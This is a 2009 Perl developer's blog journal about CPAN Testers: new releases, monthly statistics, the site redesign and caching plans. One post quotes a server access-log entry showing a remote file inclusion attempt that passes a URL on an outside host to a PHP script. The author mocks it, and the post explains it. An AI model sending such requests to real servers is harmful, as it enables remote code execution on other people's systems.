barbie (2653)

barbie
  reversethis-{ku. ... m} {ta} {eibrab}
http://barbie.missbarbell.co.uk/

Leader of Birmingham.pm [pm.org] and a CPAN author [cpan.org]. Co-organised YAPC::Europe in 2006 and the 2009 QA Hackathon, responsible for the YAPC Conference Surveys [yapc-surveys.org] and the QA Hackathon [qa-hackathon.org] websites. Also the current caretaker for the CPAN Testers websites and data stores.

If you really want to find out more, buy me a Guinness ;)

Links:
Memoirs of a Roadie [missbarbell.co.uk]
[pm.org]
CPAN Testers Reports [cpantesters.org]
YAPC Conference Surveys [yapc-surveys.org]
QA Hackathon [qa-hackathon.org]

Journal of barbie (2653)

Wednesday July 15, 2009
01:39 PM

Test::JSON::Meta

A few days ago, Ricardo did a braindump of his current projects. One that interested me concerned META.json, intended to complement META.yml in CPAN package distributions.

As a consequence I started porting my META.yml test modules to create a META.json one. A few moments ago it got sent to PAUSE, so expect a new distro to my roster to hit a CPAN mirror near you shortly.

Test-JSON-Meta

Monday July 13, 2009
09:42 AM

No PHP here, mate

I'm not sure whether this is amusing or embarrassing:

80.93.48.103 - - [13/Jul/2009:16:30:21 +0200] "GET /show//components/com_simpleboard/file_upload.php?sbp=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" 404 365 "-" "libwww-perl/5.803" 189 www.cpantesters.org

In case you're wondering, the above is an entry from the access logs on the CPAN Testers server. The script they are trying to access doesn't exist, and from what I can tell it's a poor attempt at crashing a server. The bit that amused me is that they're using LWP to run a PHP app. The bit that's embarrassing is that Perl is being used for undesirable purposes :(
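As a rough illustration of how entries like this could be picked out of an access log, here is a minimal sketch in Python. The regular expression assumes the common "combined" log layout followed by extra trailing fields, as in the entry above. The helper names (parse_line, has_remote_url_param) and the heuristic itself are hypothetical and are not anything running on the CPAN Testers server.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Sample entry from the post (with the line-wrap space in "wp-includes" removed).
SAMPLE = (
    '80.93.48.103 - - [13/Jul/2009:16:30:21 +0200] '
    '"GET /show//components/com_simpleboard/file_upload.php'
    '?sbp=http://quangpham.info/wp-includes/images/blank.gif?? HTTP/1.1" '
    '404 365 "-" "libwww-perl/5.803" 189 www.cpantesters.org'
)

# Assumed layout: combined log format; anything after the user agent is ignored.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>.*?) (?P<proto>HTTP/[\d.]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)

def parse_line(line):
    """Return a dict of the named fields, or None if the line does not match."""
    match = LOG_RE.match(line)
    return match.groupdict() if match else None

def has_remote_url_param(target):
    """Hypothetical heuristic: does any query parameter value start with a URL scheme?"""
    query = urlsplit(target).query
    return any(
        value.lower().startswith(("http://", "https://", "ftp://"))
        for _, value in parse_qsl(query, keep_blank_values=True)
    )

record = parse_line(SAMPLE)
if record and has_remote_url_param(record["target"]):
    print(record["ip"], record["status"], record["agent"])
```

A request for a page that passes a full URL as a parameter value is not proof of bad intent, so a check like this is only a starting point for a closer look.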

Saturday July 04, 2009
08:45 AM

CPAN Testers Summary - June 2009 - The Nylon Curtain

Cross posted from the CPAN Testers Blog.

June saw a lot of work behind the scenes for CPAN Testers. At the end of the month David and Ricardo finally got to release Metabase to CPAN, the project key to moving towards CPAN Testers 2.0. If you're interested in helping out or finding out more, join the mailing list, or take a look at the current Github repo. David has identified some of the areas still to be worked on, so if you have some tuits to help out, it would be very much appreciated.

The end of June also enjoyed the sun in Pittsburgh as part of YAPC::NA 2009, aka YAPC|10. While there were some testing related talks, there wasn't a specific CPAN Testers talk this year, or BOF. So much has been going into the work of getting the websites upgraded I never got the time to prepare a talk about it all. Next year hopefully we'll have a lot more to say about Metabase and the CPAN Testers 2.0 infrastructure. The talk I did do in Pittsburgh, The Statistics of CPAN, did however highlight some very positive numbers about the state of CPAN. If nothing else it highlights that CPAN Testers has a lot of work to continue with for a long time to come. I'm looking at putting a number of the tables and graphs into the CPAN Testers Statistics website, and if you have any suggestions for more, please let me know.

Following the changes in the CPAN Testers Reports website, the old domains now point to the static pages. Thanks to Ask, Robert and Jos for helping out with that. In doing so, a number of issues were pointed out that caused problems for others, specifically with the YAML files that are produced. Due to the vast number of reports now available, processing them is extremely time consuming. To reduce the overhead, I ended up streamlining the data recorded in the YAML and JSON files, as several fields were either repeated or completely redundant. Unfortunately this has meant that some consumers of these files are now unable to process them correctly. As such there is now a new distribution on CPAN, CPAN-Testers-WWW-Reports-Parser, which can be used to correctly parse a CPAN Testers YAML or JSON file or data block, and return the fields you want. It supports all the fields previously used and knows how to construct them all from the current data set. If you plan on using the CPAN Testers data for a future project, please consider using this to ensure any future changes are instantly picked up with a simple upgrade.

Last month we had a total of 165 testers submitting reports. The mappings this month included 34 total addresses mapped, of which 17 were for newly identified testers.

Congratulations to Dan Collins, who managed to post over 89,000 test reports in a single month, the highest we've ever had. Unsurprisingly Chris wasn't too far behind :) I was also delighted to meet up with George Greer at YAPC|10. For those that weren't aware, George took the honour of the 4 millionth post to the CPAN Testers mailing list at the end of May. A few days later, on June 7th, Serguei Trouchelle posted the 4 millionth accepted test report. Hopefully I'll get to meet Serguei at some point too. On average we have previously been seeing just over 200,000 reports posted each month; however, June saw 358,107 reports posted, a staggering amount of effort from all the testers.

The next summary will hopefully be posted during YAPC::Europe 2009 in Lisbon. If you're a tester and will be there too, please come and say hello.

Tuesday June 02, 2009
07:37 AM

CPAN Testers Stats - May Summary - Seven Stories Into Eight

Cross posted from the CPAN Testers Blog

Quite a bit of activity has been happening in the last month, as you are no doubt aware if you are already reading this :) It marks a significant leap forward for CPAN Testers, which I hope continues.

First off, David Golden managed to successfully input a report into the Metabase, following the full process of testing, reporting, and submitting the report. The Metabase is the centrepiece of the whole move to CPAN Testers 2.0, so this is a major step forward. There is still plenty to do before CT2.0 is fully implemented, but it is a great step towards the end goal. Well done to David and Ricardo.

The biggest visual change that happened last month was the facelift given to several of the CPAN Testers websites. The new look had been on the cards for quite some time, but it wasn't a high priority, as functionality changes took most of my time. However, with some enforced CFT, I finally got a round tuit (although sadly not one of those wooden ones I see every so often at conferences :( ). Prompted by a post by Adam Kennedy, I spent some time after doing the biggest functionality changes looking at ways to improve the look and feel. I found a design that looked suitable, and began to adapt it into the look and feel that was released. Despite some disappointed comments, the majority of feedback has been very favourable.

Part of the functionality changes included with the release of the new designs was to have a static site that reflects all the recent fixes to the underlying codebase, but without all the Javascript extras available in the dynamic site. A number of people have been asking for a site that would enable them to switch from the old site, including some with accessibility issues. As the old sites had not been updating since the end of March, the need for the static site grew. After a week bedding the new site in, the old URLs have now been moved to the new sites, so you will at least get redirected now. However, I would like to ask that if you have any reference to the old domains in code or documentation, or can update any wikis or online articles, please change to the new domains. If you don't have access or cannot update any changes, please let me know and I will try and contact the right author. The domains to change are:

On the 30th March 2009, at around 2.15AM, the 4 millionth post to the cpan-testers mailing list was made. While we still have a little way to go for the 4 millionth report, it still marks an impressive milestone in the history of CPAN Testers. With just another 80,000 or so reports to go, we should reach the 4 millionth report sometime this month.

On the CPAN Testers Discussion mailing list, I happened to point out that on every page of the new site design, across all the sites, the footer now includes a reference to the Perl programming language. David Golden has now done the same for the reports from CPAN-Reporter, but he lamented that we hadn't been doing this from the start. Thankfully I have a solution for that, as another site I'm planning on implementing is one to replace the NNTP web interface that is currently used. So that'll be 4 million web pages to add to the engines :)

We topped 144 testers submitting reports last month, so thank you again to everyone involved. The mappings this month included 36 total addresses mapped, of which 22 were for newly identified testers.

Monday May 25, 2009
01:11 PM

Dig The New Breed

Launch Day

After much anticipation, I am delighted to finally announce the launch of all the new designs for the CPAN Testers family of websites. Or at least the ones I look after. This is a major step forward for the websites, as they have long been in need of a facelift to bring them into line with each other. While my design skills are not l33t by any stretch, hopefully they have served me well enough to give the sites a more professional and polished look.

The New Designs

If you haven't seen the sites yet, follow any of the links below. You can then click one of the options from the family navigation bar to see all the others :)

The Static Reports

As mentioned on several occasions, there is now a static site version of CPAN Testers Reports. However, please bear in mind that some of the pages are huge and will take your browser several minutes to render. The static site is provided as a companion to the dynamic site for those who either do not wish to use Javascript, or whose method of viewing does not support it. The same code is used to generate the pages of both sites, so rest assured that any future fixes will be replicated into both sites at the same time.

Once any potential issues are ironed out, I hope to get Jos to switch the DNS for the old testers.cpan.org to point to the new static site. As such, if you currently use the old site and feel there is anything missing from the new site, please let me know as soon as possible.

The CPAN Testers Blog

Another new addition to the CPAN Testers family of websites is the new CPAN Testers Blog. Initially this will just contain the summaries and some of the announcements (as ported from the blog on the old CPAN Testers Statistics site) that have been made over the past couple of years, but in time I hope to encourage others involved with CPAN Testers to contribute news and articles for inclusion.

Feedback

It seems like it's taken forever to get these changes done, though in reality it has only been about 2-3 months. It has been an intense working regime, having spent most of my waking, non-employer working hours on the sites, and pretty much full-time during April. I'd personally like to thank Nicole, partly as an art advisor critiquing some of the colour choices, but mostly for putting up with me sitting on the sofa in the evenings for the past few months, while I've been getting all the changes done.

As per usual, if there are any problems or (helpful) suggestions you have regarding the new design or a specific site, please let me know.

Now it's time for a rest!

Sunday May 24, 2009
02:43 PM

Cleaning up the Meta

Taking a break from waiting for the CPAN Testers updates (nearly done), I took some time to review some updates to the META.yml test distributions, which have had a couple of outstanding bug reports that should have been applied months ago. My thanks to David Golden and Jonathan Yu for their bug reports and patches.

I've also now added the repos to GitHub, so feel free to follow the repos and send patches if you have any suggestions for improvement.

Thursday May 21, 2009
04:41 PM

Waiting For The Big One

The new family is now sitting waiting patiently; all but the big one are up to speed and ready to say hello to the world. Unfortunately the big one is HUGE and, despite ripping through data like a hot knife through butter, still has a large amount to get through.

The old reports site currently holds over 5.2GB of data files, and the new site is likely to be over 10GB. The builder behind the scenes is getting through roughly 200 data points an hour (producing 6 files for every data point). There are over 25,000 data points in total, and after a day of processing the builder still has 21,000 data points to go. Understandably the database usage is going through the roof, but amazingly the live site doesn't seem to be suffering.
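Taking those rough figures at face value, a quick back-of-the-envelope estimate of the remaining build time can be sketched in Python as below. The function name is hypothetical and the inputs are just the approximate numbers quoted above, so treat the result as an order-of-magnitude guide only.

```python
def hours_remaining(points_left, points_per_hour):
    """Estimated hours left, assuming the build rate stays constant."""
    return points_left / points_per_hour

POINTS_LEFT = 21_000      # data points still to build (approximate)
POINTS_PER_HOUR = 200     # observed build rate (approximate)
FILES_PER_POINT = 6       # files produced for every data point

hours = hours_remaining(POINTS_LEFT, POINTS_PER_HOUR)
days = hours / 24
files = POINTS_LEFT * FILES_PER_POINT

print(f"{hours:.0f} hours, about {days:.1f} days, {files} files still to write")
# prints "105 hours, about 4.4 days, 126000 files still to write"
```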

I'm hoping that over the weekend the builder will get through a large enough chunk of the remaining data points, so that I can finally do the official launch next week. Check back here after the weekend for an update :)

Sunday May 17, 2009
05:01 PM

Dynamic CPAN Testers Reports - Phases Two, Three & Four!

After much talk about the ideas for improving the CPAN Testers Reports, I'm finally pleased to announce the completion of the work so far. There have been 3 significant changes to the site behind the scenes, all of which will hopefully improve the way everyone interacts with the site.

Phase Two was to finish off a number of changes to enable a dynamic site. As it's turned out, a full dynamic site hasn't been possible, as some of the pages still take several minutes to retrieve all the records from the database and render the pages. The 'ADAMK test' took over 30 minutes! As such, a redesign of the caching was implemented, which now means the pages are updated in the background. It means that the most frequently visited pages are more likely to be up to date now.

Phase Three was to implement a flat HTML site, that was similar to the old site, before the Javascript was included, but also benefits from all the fixes that have been implemented into the current site. As a result of the caching changes in Phase Two, this was actually extremely easy to implement, as it only meant adding templates.

With all that done, I was virtually ready to implement the sites on the live server. However, following a post by Adam Kennedy about the state of some of the Perl websites, I decided to hold back and concentrate on Phase Four. This last phase wasn't just planned for the reports sites, but aimed at covering all the CPAN Testers websites I'm responsible for. When I first created the Statistics website, I was more interested in making the data and information available, and always figured I'd get around to designing a proper layout at some point. With me taking a month out during April, the time was ripe to completely redesign all the sites. So taking an initial design from the OSWD site, I amended it appropriately for my uses, and I have now converted all the CPAN Testers sites I look after across to the new design.

Hopefully the new design will meet with everyone's approval (Leon, fear not there is still an orange colour scheme in there :)), and the changes to the functionality improve the way people are able to use and access the site. For the time being the old path mappings should remain working, but I would advise moving to the new path structure when the sites go live.

So when are you going to get to see all these changes? Well very very soon. I'm currently setting up the new designs on the server and once everything is in place I'll be doing a symlink switch. Please be patient .. just a little while longer ;)

Tuesday May 05, 2009
05:00 PM

CPAN Testers Stats - April Summary - Hau Ruck

CPAN Testers Statistics

So this month has mostly featured a lot of work after the QA Hackathon, without too many announcements. While there have been a lot of changes behind the scenes, we've mostly been getting on with stuff. David Golden and Ricardo Signes have been continuing with the Metabase, to the point David can now submit reports locally. There is still a bit of work needed to get the rest of the pieces all synced and working, but we are getting closer to CT2.0.

The mailers managed to highlight a fault recently, that has now been fixed, so if you've been wondering why the Summaries haven't been appearing, they should start filtering through again soon. As announced during April, there are now Weekly and Monthly Summary reports available, as well as the ability to receive individual mails again. Check the appropriate pages on the CPAN Testers Preferences website and update as you require.

As mentioned in my blog last week, my time over the last month has featured work on the dual dynamic and static sites for the Reports. I'm pleased to say the underlying code is now complete. It will take a little while to carefully change the live system, as there are some significant database changes required, so I want to make sure the changes don't have any adverse effects. In addition, prompted by Adam Kennedy's blog post about the state of many Perl websites, I took some time to look at some designs and found one that looked perfect for the job. I've now reskinned several of the CPAN Testers sites and just have 1 publicly visible site left to do. There is another that has been waiting in the wings for some time, but I may wait until CT2.0 is available before unleashing it. However, with all the changes going on, there is one site that will be new (sort of), although it really is just a fork of one of the existing sites. Seeing as I don't want to spoil the surprises, you're just going to have to wait for a little while longer to see all the results :)

We passed 3.5 million test reports last month, and although there were quite a number of reports posted last month, considering that last month CPAN had the most distributions submitted in a month ever (1897), it wasn't quite as many as I would have expected. Unfortunately the graphs on CPAN Testers Statistics have reached their Google Chart limit, so I'll be altering the graphs slightly for next month.

We topped 149 testers submitting reports last month, so thank you again to everyone involved. The mappings this month included 24 total addresses mapped, of which 10 were for newly identified testers.

Friday May 01, 2009
09:15 AM

What Happened to April?

For those that might not be aware, I got made redundant on 31st March (the day after the QA Hackathon had finished). Thankfully, I start a new job next week, so I've managed to land on my feet. However, this has meant that I've ended up having the whole of April off to do stuff. My plan was to work on some of the Open Source projects that I'm involved with to move them further along to where I wanted them to be. As it turned out two specific projects got my attention over the last 4 weeks, and I thought it worth giving a summary of what has been going on.

YAPC Conference Surveys

Since 2006, I've been running the conference surveys for YAPC::Europe. The results have been quite interesting and hopefully have helped organisers improve the conferences each year. For 2009 I had already planned to run the survey for YAPC::Europe in Lisbon, but this year will also see YAPC::NA in Pittsburgh having a survey of their own.

The survey site for Copenhagen in 2008 added the ability to give feedback to Master Classes and talks. The Master Classes feedback was a little more involved, as I was able to get the attendee list, but the talks feedback was quite brief. As such, I wanted to try and expand on this aspect and generally improve the process of running the surveys. Part of this involved contacting Eric and BooK to see if ACT had an API I could use to automate some of the information. I was delighted to get an email back from Eric, who very quickly incorporated an API that I could use, to retrieve the necessary data to keep the survey site for a particular conference up to date, even during the conference.

With the API and updates done, it was time to focus on expanding the surveys and skinning the websites to match that of the now live conference sites. The latter was relatively easy, and only required a few minor edits to the CSS to get them to work with the survey site. The survey site now has 3 types of survey available, though only 2 are visible to anyone not taking a Master Class. Those that have taken one of the YAPC::Europe surveys will be aware I don't use logins, but a key code to access the survey. This has been extended so that it can now be used to access your portion of the survey website. This can now be automatically emailed to attendees before the conference, and during if they pay on the door, and will allow everyone to feedback on talks during the conference. On the last day of the conference the main survey will be put live, so you can then answer questions relating to your conference experience.

I'm hoping the slight change won't be too confusing, and that we'll see some even greater returns for the main survey. Once it does go live, I'd be delighted to receive feedback on the survey site, so I can improve it for the future.

CPAN Testers Reports

Since taking over the CPAN Testers Reports site in June 2008, I have spent a great deal of time improving its usability for users. However, it's come at a price. By using more and more Javascript to dynamically change the contents of the core pages, it's meant that I have received a number of complaints that the site doesn't work for those with Javascript disabled or who use a browser that doesn't implement Javascript. For this reason I had decided that I should create a dynamic site and a static site. The problem with this is that the current system to create all the files takes several hours for each set of updates (currently about 16 hours per day). I needed a way to drive the site without worrying about how long everything was taking, but also add some form of prioritisation so that the more frequently requested pages would get updated more quickly than those rarely seen.

During April, JJ and I went along to the Milton Keynes Perl Mongers technical meeting. One of the talks was about memcached and it got me thinking as to whether I could use it for the Reports site. Discussing this with JJ on the way home, we threw a few ideas around and settled on a queuing system to decide what needed updating, and on better managing the current databases by adding indexes to speed up some of the complex lookups. I was still planning to use caching, but as it turned out memcached wasn't really the right way forward.

The problem with caching is that when there is too much stuff in the cache, the older stuff gets dumped. But what if the oldest item to get dumped is extremely costly on the database, and although it might not get hit very often, it's frequent enough to be worth keeping in the cache permanently? It's possible this could be engineered with memcached if this was for a handful of pages, but for the Reports site it's true for quite a few pages. So I hit on a slightly different concept of caching. As the backend builder process is creating all these static files, part of the process involves grabbing the necessary data to display the basic page, with the reports then being read in via the now static Javascript file for that page. Before dropping all the information and going on to the next in the list, the backend can simply write the data to the database. The dynamic site can then simply grab that data and display the page pretty quickly, saving a lot of database lookups. Add to that the fact that the database tables have been made more accessible to each other, and the connection overhead has also been reduced considerably.
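To make the idea concrete, here is a minimal sketch of that kind of persistent page cache, written in Python with SQLite purely for illustration. It is not the code behind the Reports site: the table name, column names and function names are all hypothetical, and the real data stored per page will differ.

```python
import json
import sqlite3

def open_cache(path=":memory:"):
    """Open (or create) the hypothetical page_cache table."""
    db = sqlite3.connect(path)
    db.execute(
        "CREATE TABLE IF NOT EXISTS page_cache ("
        " page TEXT PRIMARY KEY,"
        " data TEXT NOT NULL,"
        " last_report_id INTEGER NOT NULL)"
    )
    return db

def store_page(db, page, data, last_report_id):
    """Builder side: save the data already gathered for a page before moving on."""
    db.execute(
        "INSERT OR REPLACE INTO page_cache (page, data, last_report_id)"
        " VALUES (?, ?, ?)",
        (page, json.dumps(data), last_report_id),
    )
    db.commit()

def load_page(db, page):
    """Dynamic site side: one cheap lookup instead of the expensive queries."""
    row = db.execute(
        "SELECT data, last_report_id FROM page_cache WHERE page = ?", (page,)
    ).fetchone()
    if row is None:
        return None
    return json.loads(row[0]), row[1]

db = open_cache()
store_page(db, "author/EXAMPLE", {"distributions": 3}, last_report_id=42)
print(load_page(db, "author/EXAMPLE"))
```

Unlike a size-limited cache, nothing here is ever evicted, so an expensive but rarely visited page stays available until the builder overwrites it with fresher data.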

The queuing system I've implemented is extremely simple. On grabbing the data from the cache, the dynamic site checks quickly to see if there is a more recent report in existence. If there is, then an entry is added to the queue, with a high weighting to indicate that a website user is actually interested in that data. Behind the scenes the regular update system simply adds an entry in the queue to indicate that a new entry is available, but at a low weighting. The backend builder process then looks to build the entries with the most and highest weightings and builds all the static files, both for the dynamic site and the static site, including all the RSS, YAML and JSON files. It seems to work well on the test system, but the live site will be where it really gets put through its paces.
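The weighting scheme described above could be sketched roughly as follows. This is an illustrative Python sketch, not the site's actual implementation: the class, the function names and the two weight values are assumptions, and "most and highest weightings" is interpreted here as the largest total weight per page.

```python
from collections import Counter

USER_WEIGHT = 10    # hypothetical weight: a visitor asked for this page
UPDATE_WEIGHT = 1   # hypothetical weight: the regular update saw a new report

class BuildQueue:
    """Accumulates weight per page; the builder takes the heaviest page first."""

    def __init__(self):
        self._weights = Counter()

    def add(self, page, weight):
        self._weights[page] += weight

    def next_page(self):
        """Remove and return the page with the highest total weight, or None."""
        if not self._weights:
            return None
        page, _ = max(self._weights.items(), key=lambda item: item[1])
        del self._weights[page]
        return page

def on_page_view(queue, page, cached_report_id, latest_report_id):
    """Dynamic site side: queue a rebuild if the cached data is out of date."""
    if latest_report_id > cached_report_id:
        queue.add(page, USER_WEIGHT)

queue = BuildQueue()
queue.add("distro/Foo", UPDATE_WEIGHT)      # two new reports arrive for Foo
queue.add("distro/Foo", UPDATE_WEIGHT)
queue.add("distro/Bar", UPDATE_WEIGHT)      # one new report arrives for Bar
on_page_view(queue, "distro/Bar", cached_report_id=100, latest_report_id=101)

print(queue.next_page())  # prints "distro/Bar"
print(queue.next_page())  # prints "distro/Foo"
```

Summing the weights means a page that visitors keep requesting, or that keeps receiving new reports, rises up the queue without the builder needing any extra bookkeeping.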

So you could be forgiven for thinking that's it, the new site is ready to go. Well, not quite. Another part of the plan had always been to redesign the website. Leon had designed the site based on the YUI layouts, and while it works for the most part, there are some pages which don't fit well in that style. It also has been pretty much the same kind of style since it was first launched, and I had been feeling for a while that it needed a lick of paint. Following Adam's blog post recently about the state of Perl websites, I decided that following the functional changes, the site would get a redesign. It's not perhaps as revolutionary as some would want, judging from some of the ideas for skins I've seen, but then the site just needs to look professional, not state of the art. I think I've managed that.

The work to fit all the pieces together and ensure all the templates are correct is still ongoing, but I'm hopeful that at some point during May, I'll be able to launch the new look websites on the world.

So that's what I've been up to. I had hoped to work on Maisha, my other CPAN distributions, the YAPC Conference Survey data, the videos from the QA Hackathon among several other things, but alas I've not been able to stop time. These two projects perhaps have the highest importance to the Perl community, so I'm glad I've been able to get on with them and get done what I have. It's unlikely I'll have this kind of time again to concentrate solely on Open Source/Perl for several years, which in some respects is a shame, as it would be so nice to be paid to do this as a day job :) So for now, sit tight, it's coming soon...